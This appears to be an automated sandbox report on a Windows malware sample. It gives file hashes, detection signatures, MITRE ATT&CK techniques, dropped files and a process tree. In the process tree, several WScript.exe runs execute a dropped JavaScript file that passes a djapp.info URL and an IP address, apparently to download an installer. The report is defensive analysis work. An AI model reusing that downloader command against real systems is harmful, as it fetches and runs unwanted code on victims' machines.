af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836

Analysis

max time kernel
137s
max time network
170s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
04/12/2022, 11:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe
Size

184KB
MD5

2d6c0ba7e4300aeb44dbe02ffb9edb41
SHA1

a5965e259de6c1e6965f9e4857d5b3569c0544d8
SHA256

af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836
SHA512

c32a3bdddd2b93023f881a7a344f6420108389faa50fc9d522f7331113bcf383a1fa6e31bc529239586c84e5f63bd1647ce94c44a087b6ee6b6015cec4151667
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3/:/7BSH8zUB+nGESaaRvoB7FJNndne

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 17 IoCs

flow	pid	Process
3	952	WScript.exe
6	952	WScript.exe
10	952	WScript.exe
12	952	WScript.exe
14	952	WScript.exe
16	952	WScript.exe
17	952	WScript.exe
18	1808	WScript.exe
20	1808	WScript.exe
22	1808	WScript.exe
23	1808	WScript.exe
24	1096	WScript.exe
26	1096	WScript.exe
27	1212	WScript.exe
29	1212	WScript.exe
30	1580	WScript.exe
32	1580	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 816 wrote to memory of 952	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	28
PID 816 wrote to memory of 952	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	28
PID 816 wrote to memory of 952	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	28
PID 816 wrote to memory of 952	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	28
PID 816 wrote to memory of 1808	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	31
PID 816 wrote to memory of 1808	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	31
PID 816 wrote to memory of 1808	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	31
PID 816 wrote to memory of 1808	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	31
PID 816 wrote to memory of 1096	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	33
PID 816 wrote to memory of 1096	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	33
PID 816 wrote to memory of 1096	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	33
PID 816 wrote to memory of 1096	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	33
PID 816 wrote to memory of 1212	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	34
PID 816 wrote to memory of 1212	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	34
PID 816 wrote to memory of 1212	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	34
PID 816 wrote to memory of 1212	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	34
PID 816 wrote to memory of 1580	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	36
PID 816 wrote to memory of 1580	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	36
PID 816 wrote to memory of 1580	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	36
PID 816 wrote to memory of 1580	816	af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe	36

C:\Users\Admin\AppData\Local\Temp\af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe
"C:\Users\Admin\AppData\Local\Temp\af51d43ce8689be750e3990ee02f6a5c6481ba6208bfceb72419eb85e5a1b836.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:816
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9648.js" http://www.djapp.info/?domain=PCQxxFyuDt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf9648.exe
  2⤵
  - Blocklisted process makes network request
  PID:952
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9648.js" http://www.djapp.info/?domain=PCQxxFyuDt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf9648.exe
  2⤵
  - Blocklisted process makes network request
  PID:1808
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9648.js" http://www.djapp.info/?domain=PCQxxFyuDt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf9648.exe
  2⤵
  - Blocklisted process makes network request
  PID:1096
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9648.js" http://www.djapp.info/?domain=PCQxxFyuDt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf9648.exe
  2⤵
  - Blocklisted process makes network request
  PID:1212
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9648.js" http://www.djapp.info/?domain=PCQxxFyuDt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf9648.exe
  2⤵
  - Blocklisted process makes network request
  PID:1580

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F

Filesize
7KB

MD5
406b3f4c3dcb12ac7ee515803cdbaccf

SHA1
48ce8c5e2a34f081f9f2f8de76f9c9ff8186a351

SHA256
824b08bb5371b3583f45b4c08037edc08b30860079d8a6ea5dbee813bc7625ca

SHA512
6c700f89161ed263cf4a13bdf28d8dfaece63c52a50487863ca43a4ed584eb55eea5c2093275421439ee887752195692a3242e8621dcf2bd881c99214c5afc92

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
280B

MD5
986eda6a044d40b54bc41dfac0bfed2b

SHA1
d7928d9714ff509a0ba1f101be7307b01b785867

SHA256
ecaa7e6680e036e4538113e4a83faff190440faf053328406e0f2f8ad3458944

SHA512
b2d071d3e3ef9527b554d30bbadd2c5231fe60bec26aa2dbb30b9e8c32db982e756c570910755af85d1435193ad3af2f9131a59a71f345992d53a4c8948120a2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F

Filesize
232B

MD5
252be46a3a47d324256cb0daa189b702

SHA1
e962acfde44f756183434d5571b2c72702fa801b

SHA256
b91fc6b031b5cf529563b963c5744f431c5d5293372adcd2c41ddae03f2df1e9

SHA512
bcbb296687fc66f038e754ee653f3fa28428faa2df44ed748fe1c7eb790214d972a6d05e4709b63e3482b65614e26a919460d6233397726d1952a122c1ef043f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
340B

MD5
885a9ccd4c8dee0f45755e20f4387efb

SHA1
43c5c1020aa835de6f1abf49b00afd4c9db697ed

SHA256
ab323c686e304ea26f277c552afa3211b7486912ba516e0788dd39d5268a10ee

SHA512
3e77c6005389e88ce59ee157adae2478bbcc5cbadeefa1edfb1b4378c83eec5c9a7ef6a3e4cd757206e7c2cf1ec2b11acc420ed39f1fe05b020f3e59a0ea2b01

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
426B

MD5
129fd1c4b3c8e6c8405899ecd75b3fe0

SHA1
597668c7d671b8edc4f191f2e8bcb44e36a44cb5

SHA256
31fedb8f887287ac774a8ce225052443da9e19d55701928ae3490fbf745b38fc

SHA512
bc71d89f189208f2f7966387aa3b51cc9f8139c93e039abc0b8677b75834d6f1279c46f25f07953e237f8f762baa20a3c8faafebb0625d2e93dbf893f5b9cfa3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XB6YKGN8\domain_profile[1].htm

Filesize
7KB

MD5
a8fe153e4bbb2f8f41c1b119fad59de4

SHA1
6c4e8c16b8530822dfa552ae55da014304266a4a

SHA256
26fd52ada41d2e677d2fd26d87021935b55ccd098cde8e82f963a67011b9466e

SHA512
e4ea20890b1a0436a3947bd2f4ecff9aca84e412fa7e092cdd4c3dc78b8c009dce7a3017b121f3be00fc9b7eb01e8c6a63a192a9caac806158231a8f06467be6

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf9648.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4HLN7FGQ.txt

Filesize
100B

MD5
f34bb2b3882f1b23c2b98233fe4454f8

SHA1
d3a8c83bde10a619f6b8975dc89a57c23328506f

SHA256
d8dab218ce4bfa87d25e8054a87fc555f02a4c4d86c7c1f9db2c445318f8ce1e

SHA512
e637fa501094b3fe684fbaa203b8455bb9db6b500218be61dc5b137570393e21aa15d7dd4f943f7c0ed0b0a7cc9c7a2f927b62cbe87d1284178e60fab7de6b30

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6OM1FFG5.txt

Filesize
177B

MD5
be14003333bd04c9fc8d43a61fdcc694

SHA1
5db1d3b8fc5f8ef5a323c4d761ea2bf35f515cca

SHA256
d4195f48fa6b51a9aa9987b6af631922ed82a11b125c97bbb6302bc5424c1219

SHA512
f21b25c1eb167ef24683202ebf107a890d995c7122e445e69e471f935cf562a5bb5848f818cc699b7cf6b49ad89a8fdb15cfda8f979cee1d58886f9c107d7015

Download Submit
memory/816-54-0x0000000076711000-0x0000000076713000-memory.dmp

Filesize
8KB

Download